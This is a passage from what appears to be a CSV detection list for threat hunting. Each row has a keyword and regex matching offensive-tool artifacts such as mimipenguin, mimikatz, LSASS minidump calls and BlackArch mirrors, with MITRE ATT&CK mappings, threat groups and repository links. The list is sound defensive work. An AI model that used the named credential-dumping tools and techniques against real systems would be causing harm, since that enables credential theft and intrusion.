networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","52065" "*mimipenguin.py*",".{0,1000}mimipenguin\.py.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","52066" "*mimipenguin.sh*",".{0,1000}mimipenguin\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","52067" "*mimipenguin.so*",".{0,1000}mimipenguin\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","52068" "*mimipenguin_*.tar.gz*",".{0,1000}mimipenguin_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","#linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","52069" "*mimipenguin_x32.so*",".{0,1000}mimipenguin_x32\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","52070" "*mimipy.py*",".{0,1000}mimipy\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","52071" "*mimipy_loot_passwords*",".{0,1000}mimipy_loot_passwords.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","52072" "*mimiRatz*",".{0,1000}mimiRatz.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","52073" "*mimishim.*",".{0,1000}mimishim\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","52074" "*mimispool (mimikatz)*",".{0,1000}mimispool\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation 
tool","https://github.com/gentilkiwi/mimikatz","1","0","#productname","https://www.virustotal.com/gui/file-analysis/NmFiMjcxYjA4YzVmODg3YTNiMTRhZTc1YmZlY2UwNmU6MTcyNDUyMDAxOA==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52075" "*mimispool for Windows (mimikatz)*",".{0,1000}mimispool\sfor\sWindows\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#description","https://www.virustotal.com/gui/file-analysis/NmFiMjcxYjA4YzVmODg3YTNiMTRhZTc1YmZlY2UwNmU6MTcyNDUyMDAxOA==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52076" "*mimispool.dll*",".{0,1000}mimispool\.dll.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - 
APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52077" "*MimiTickets\*-Tickets.txt*",".{0,1000}MimiTickets\\.{0,1000}\-Tickets\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","52078" "*minidump*minikerberos*",".{0,1000}minidump.{0,1000}minikerberos.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","52079" "*minidump.* lsass.dmp*",".{0,1000}minidump\..{0,1000}\slsass\.dmp.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","N/A","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","52080" "*Minidump.exe*",".{0,1000}Minidump\.exe.{0,1000}","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential 
Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","N/A","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","52081" "*minidump.exe*",".{0,1000}minidump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","52082" "*minidump.lsakeys*",".{0,1000}minidump\.lsakeys.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","52083" "*Minidump.sln*",".{0,1000}Minidump\.sln.{0,1000}","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","N/A","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","52084" "*minidump_add_memory_block*",".{0,1000}minidump_add_memory_block.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 
- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","1","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","52085" "*minidump_add_memory64_block*",".{0,1000}minidump_add_memory64_block.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","1","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","52086" "*minidumptomemsharp.lsa.lsaproviderduper.boo*",".{0,1000}minidumptomemsharp\.lsa\.lsaproviderduper\.boo.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","52087" "*MiniDumpWriteDump(hLsass*",".{0,1000}MiniDumpWriteDump\(hLsass.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","52088" 
"*MiniDumpWriteDump(lsass*",".{0,1000}MiniDumpWriteDump\(lsass.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","52089" "*MiniEmpireDLL.dll*",".{0,1000}MiniEmpireDLL\.dll.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","52090" "*minikerberos.zip*",".{0,1000}minikerberos\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind 
spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","52091" "*minio.dev.pico.sh*",".{0,1000}minio\.dev\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","52094" "*minio.pico.sh*",".{0,1000}minio\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","52095" "*mirror.archlinux.tw/BlackArch/*/os/*",".{0,1000}mirror\.archlinux\.tw\/BlackArch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52096" "*mirror.cedia.org.ec/blackarch/*/os/*",".{0,1000}mirror\.cedia\.org\.ec\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52097" "*mirror.cyberbits.eu/blackarch/*/os/*",".{0,1000}mirror\.cyberbits\.eu\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive 
distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52098" "*mirror.easyname.at/blackarch/*/os/*",".{0,1000}mirror\.easyname\.at\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52099" "*mirror.easyname.ch/blackarch/*/os/*",".{0,1000}mirror\.easyname\.ch\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52100" "*mirror.maa.albony.in/blackarch/*/os/*",".{0,1000}mirror\.maa\.albony\.in\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52101" "*mirror.math.princeton.edu/pub/blackarch/*/os/*",".{0,1000}mirror\.math\.princeton\.edu\/pub\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52102" 
"*mirror.serverion.com/blackarch/*/os/*",".{0,1000}mirror\.serverion\.com\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52103" "*mirror.sg.gs/blackarch/*/os/*",".{0,1000}mirror\.sg\.gs\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52104" "*mirror.sjtu.edu.cn/blackarch/*/os/*",".{0,1000}mirror\.sjtu\.edu\.cn\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52105" "*mirror.team-cymru.com/blackarch/*/os/*",".{0,1000}mirror\.team\-cymru\.com\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation 